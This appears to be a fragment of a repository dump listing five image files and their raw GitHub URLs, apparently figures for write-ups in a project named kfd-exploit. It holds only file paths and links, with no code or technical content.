-------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure6.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure1.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure2.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure3.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure4.png --------------------------------------------------------------------------------